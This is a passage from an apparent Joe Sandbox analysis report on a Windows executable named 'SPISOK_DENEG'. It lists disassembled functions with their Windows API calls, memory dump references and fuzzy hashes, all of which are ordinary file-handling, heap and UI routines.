                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 8c2df3c1184213e39fa437d5c851e5d3ad54abdc526a1e6f1355a75bc7337c01
                                                            • Instruction ID: 8e61c134386ddf3686f9dc8c24cc902dff3c6ffaab62f314ee29041b6e2eb9ea
                                                            • Opcode Fuzzy Hash: 8c2df3c1184213e39fa437d5c851e5d3ad54abdc526a1e6f1355a75bc7337c01
                                                            • Instruction Fuzzy Hash: 5B41CE316043019FDB24DF19E68446AB7E9FFD5320F168A2FE89587361D7B0ED448AB1
                                                            APIs
                                                              • Part of subcall function 000F97E5: GetLastError.KERNEL32(?,00111030,000F4674,00111030,?,?,000F3F73,00000050,?,00111030,00000200), ref: 000F97E9
                                                              • Part of subcall function 000F97E5: _free.LIBCMT ref: 000F981C
                                                              • Part of subcall function 000F97E5: SetLastError.KERNEL32(00000000,?,00111030,00000200), ref: 000F985D
                                                              • Part of subcall function 000F97E5: _abort.LIBCMT ref: 000F9863
                                                              • Part of subcall function 000FBB4E: _abort.LIBCMT ref: 000FBB80
                                                              • Part of subcall function 000FBB4E: _free.LIBCMT ref: 000FBBB4
                                                              • Part of subcall function 000FB7BB: GetOEMCP.KERNEL32(00000000,?,?,000FBA44,?), ref: 000FB7E6
                                                            • _free.LIBCMT ref: 000FBA9F
                                                            • _free.LIBCMT ref: 000FBAD5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: e09ae227f31cd8f09f97a0214e73c7e3d2c28fba3ac7a12de8d0bd783cb6629f
                                                            • Instruction ID: 5230239b92d967c9c7b03f91c2618449cd0412fe85f91017196ac3f6f27c2655
                                                            • Opcode Fuzzy Hash: e09ae227f31cd8f09f97a0214e73c7e3d2c28fba3ac7a12de8d0bd783cb6629f
                                                            • Instruction Fuzzy Hash: 1531913190420DAFDB10EFA9D441BBDB7F5EF41320F254099EA049BAA2EB765D40EF51
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D1E55
                                                              • Part of subcall function 000D3BBA: __EH_prolog.LIBCMT ref: 000D3BBF
                                                            • _wcslen.LIBCMT ref: 000D1EFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: f5724d84a3a24f416706fc94f6a245e35944ae1aa66ef242c5799f07182b9595
                                                            • Instruction ID: 4fca1e776d7a5d9684e79afd4b0b61e0c27390ed447dba961170d185d8233bf3
                                                            • Opcode Fuzzy Hash: f5724d84a3a24f416706fc94f6a245e35944ae1aa66ef242c5799f07182b9595
                                                            • Instruction Fuzzy Hash: A5312871904209AFCF15DF99C945AEEBBF6AF48310F2040AAE845B7352CB325E51DB60
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000D73BC,?,?,?,00000000), ref: 000D9DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 000D9E70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,000D9F27,?,?,000D771A), ref: 000D96E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,000D9F27,?,?,000D771A), ref: 000D9716
                                                            Similarity
                                                            • API ID: CreateFile
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 000D9EC7
                                                            • GetLastError.KERNEL32 ref: 000D9ED4
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            APIs
                                                            • _free.LIBCMT ref: 000F8E75
                                                              • Part of subcall function 000F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,000FCA2C,00000000,?,000F6CBE,?,00000008,?,000F91E0,?,?,?), ref: 000F8E38
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00111098,000D17CE,?,?,00000007,?,?,?,000D13D6,?,00000000), ref: 000F8EB1
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 000E10AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 000E10B2
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA501
                                                              • Part of subcall function 000DBB03: _wcslen.LIBCMT ref: 000DBB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA532
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,000D977F,?,?,000D95CF,?,?,?,?,?,00102641,000000FF), ref: 000DA1F1
                                                              • Part of subcall function 000DBB03: _wcslen.LIBCMT ref: 000DBB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,000D977F,?,?,000D95CF,?,?,?,?,?,00102641), ref: 000DA21F
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00102641,000000FF), ref: 000EACB0
                                                            • CoUninitialize.COMBASE(?,?,?,?,00102641,000000FF), ref: 000EACB5
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000DA23A,?,000D755C,?,?,?,?), ref: 000DA254
                                                              • Part of subcall function 000DBB03: _wcslen.LIBCMT ref: 000DBB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,000DA23A,?,000D755C,?,?,?,?), ref: 000DA280
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 000EDEEC
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 000EDF03
                                                              • Part of subcall function 000EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EB579
                                                              • Part of subcall function 000EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EB58A
                                                              • Part of subcall function 000EB568: IsDialogMessageW.USER32(00010480,?), ref: 000EB59E
                                                              • Part of subcall function 000EB568: TranslateMessage.USER32(?), ref: 000EB5AC
                                                              • Part of subcall function 000EB568: DispatchMessageW.USER32(?), ref: 000EB5B6
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000E0836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000DF2D8,Crypt32.dll,00000000,000DF35C,?,?,000DF33E,?,?,?), ref: 000E0858
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000EA3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 000EA3E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: 2906dc879755b7f87dce1ddbea23821da04c70755cb312d28c36b31b4768a5af
                                                            • Instruction ID: d5f47e91d2f6737efd09a53f53fa8ac5d4efc893860a4529a4ddcfaec5c4930c
                                                            • Opcode Fuzzy Hash: 2906dc879755b7f87dce1ddbea23821da04c70755cb312d28c36b31b4768a5af
                                                            • Instruction Fuzzy Hash: 7DE0ED71901258EFCB50DF56C5416DEBBE8EB09360F20C05AA986A3241E7B4AF04DB91
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000F2BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 000F2BB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: eec0f784155143f977f579d364c7a4a342fd3272c1bca5cb52edb00b41c6dc5c
                                                            • Instruction ID: 4371321528468d186da9c9644a3539719e7ea50703485e957ee72b91ff7e22ff
                                                            • Opcode Fuzzy Hash: eec0f784155143f977f579d364c7a4a342fd3272c1bca5cb52edb00b41c6dc5c
                                                            • Instruction Fuzzy Hash: EBD0A93515820C188CA83A7129064B83385AF81B71BA0068AFF2089CC2EB259080B512
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: 609f1757efb8ba0f6a550d91e6d707d3ec0214c1c95f519591bdfab9239a40d1
                                                            • Instruction ID: acb0fbe0f01ed7cc88cad014347d6e129c3c78ebdba7a00af37d0297a9374c39
                                                            • Opcode Fuzzy Hash: 609f1757efb8ba0f6a550d91e6d707d3ec0214c1c95f519591bdfab9239a40d1
                                                            • Instruction Fuzzy Hash: DEC0123205C200BECB010BB4DC09C2BBBA8ABA5322F04C908B4B5C0060C238C150EB11
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 518ad989e2756a95bc15e9b80ce06ee13491efdf88a37551b82931e9b2c5c118
                                                            • Instruction ID: 1f7d12f40a3f62c2332683ef582b59cb0fcc3acf2f9491e398eb4797b35124ac
                                                            • Opcode Fuzzy Hash: 518ad989e2756a95bc15e9b80ce06ee13491efdf88a37551b82931e9b2c5c118
                                                            • Instruction Fuzzy Hash: 05C17E70A00354ABEF55CF68C484BE97BE6AF15320F0801BBE8569B396DF709984CB71
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: ff0d7a75e2379283ae350c8ec603c4992b760bfa051e758e0b9513308d929d62
                                                            • Instruction ID: fa1e186785daf0751f4505a59b49d6fd09dc5b4870b3a731ebb68ab8de31d6b3
                                                            • Opcode Fuzzy Hash: ff0d7a75e2379283ae350c8ec603c4992b760bfa051e758e0b9513308d929d62
                                                            • Instruction Fuzzy Hash: 9B71B271500B849EDB35DB70C8559EBB7E9AF14301F44092FF2AB97382DA326684DF22
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D8289
                                                              • Part of subcall function 000D13DC: __EH_prolog.LIBCMT ref: 000D13E1
                                                              • Part of subcall function 000DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000DA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            • Opcode ID: 5362a830cc6955a14ea017c76f27286769101c46974c2b07a9773196b767a08d
                                                            • Instruction ID: b4bf4ff2d020c674527ebc48942e4e4aa6a3217f71ca306a6a2b5c2804469e14
                                                            • Opcode Fuzzy Hash: 5362a830cc6955a14ea017c76f27286769101c46974c2b07a9773196b767a08d
                                                            • Instruction Fuzzy Hash: 2D4184719447589ADB24DB60CC55AEEB3A8AF04304F4444EBE18EA7293EB755FC5CB20
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D13E1
                                                              • Part of subcall function 000D5E37: __EH_prolog.LIBCMT ref: 000D5E3C
                                                              • Part of subcall function 000DCE40: __EH_prolog.LIBCMT ref: 000DCE45
                                                              • Part of subcall function 000DB505: __EH_prolog.LIBCMT ref: 000DB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 9f04288405c926c962073c27a1d42e6dda0bb741cce0add348e9d6be48f34999
                                                            • Instruction ID: a10907e71fcef96e7d35f639eadb003652d7c5a19f338b7ff984b1ca297a2f53
                                                            • Opcode Fuzzy Hash: 9f04288405c926c962073c27a1d42e6dda0bb741cce0add348e9d6be48f34999
                                                            • Instruction Fuzzy Hash: 784139B0905B41AEE724DF798885AE7FBE5BF19310F50492ED5FE83282CB716654CB10
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D13E1
                                                              • Part of subcall function 000D5E37: __EH_prolog.LIBCMT ref: 000D5E3C
                                                              • Part of subcall function 000DCE40: __EH_prolog.LIBCMT ref: 000DCE45
                                                              • Part of subcall function 000DB505: __EH_prolog.LIBCMT ref: 000DB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 8d829a8b47d20319b3959a9d941fabbae14d4b46c9b34843d05e054256cd2519
                                                            • Instruction ID: 03cd3082fcf331419545317763a7e1e73704a4c00de061a9b44ff7ae4386e59f
                                                            • Opcode Fuzzy Hash: 8d829a8b47d20319b3959a9d941fabbae14d4b46c9b34843d05e054256cd2519
                                                            • Instruction Fuzzy Hash: 954139B0905B809EE724DF798885AE7FBE5BF19310F50492ED5FE83282CB726654CB10
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000EB098
                                                              • Part of subcall function 000D13DC: __EH_prolog.LIBCMT ref: 000D13E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 1893989b71930089c21a0d8a25ce688ccd599808a31592c47ebb8f6d3676a62c
                                                            • Instruction ID: 265835c63f0eabeea1c7c42e4bf685cb1954c64da38c256fdd309fb65d9b59c8
                                                            • Opcode Fuzzy Hash: 1893989b71930089c21a0d8a25ce688ccd599808a31592c47ebb8f6d3676a62c
                                                            • Instruction Fuzzy Hash: 5F316B71C00289AECF15DF69D9519EFBBB4AF09310F5044AEE409B7242DB35AE04CB71
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 000FACF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 144ba71711b0110bff4e5f95009921131f0c0369d4d7f0638481819f24617f0e
                                                            • Instruction ID: 1eee1ff6a8881af88e8fd724a690255579386e30d883ed3de683915b33303d0d
                                                            • Opcode Fuzzy Hash: 144ba71711b0110bff4e5f95009921131f0c0369d4d7f0638481819f24617f0e
                                                            • Instruction Fuzzy Hash: 8111E7B370022D5FDB229E19EC409BA73D5AB8632071A4520FE5EABE54D630DC41A7D2
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000DCE45
                                                              • Part of subcall function 000D5E37: __EH_prolog.LIBCMT ref: 000D5E3C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 0b78a0a40dca4b745452cbd42549eaaa620abae59e393365af90955c40e398f1
                                                            • Instruction ID: be15bd1e4e20d47cc8c294b3b30b10d5e386c28a488e93a13ab2c15f713b5f9b
                                                            • Opcode Fuzzy Hash: 0b78a0a40dca4b745452cbd42549eaaa620abae59e393365af90955c40e398f1
                                                            • Instruction Fuzzy Hash: F3114F71A003949EEB14EB79C545BEEB7E89F45300F10445EA446E3383DBB45A04D772
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: b01d7318f1ccc12f01ac6ffb86d459750f7327c8c8441c6cc442a1ccc231290c
                                                            • Instruction ID: a2b1634d20710dfb5bc3ed25bf82efe29ec061efd5aaaeb6fe979c78bd45a901
                                                            • Opcode Fuzzy Hash: b01d7318f1ccc12f01ac6ffb86d459750f7327c8c8441c6cc442a1ccc231290c
                                                            • Instruction Fuzzy Hash: FA016537900668BBCF12ABA8CD819EEB775AF88750F014517E916B7353DA348D05C6B0
                                                            APIs
                                                              • Part of subcall function 000FB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000F9813,00000001,00000364,?,000F3F73,00000050,?,00111030,00000200), ref: 000FB177
                                                            • _free.LIBCMT ref: 000FC4E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
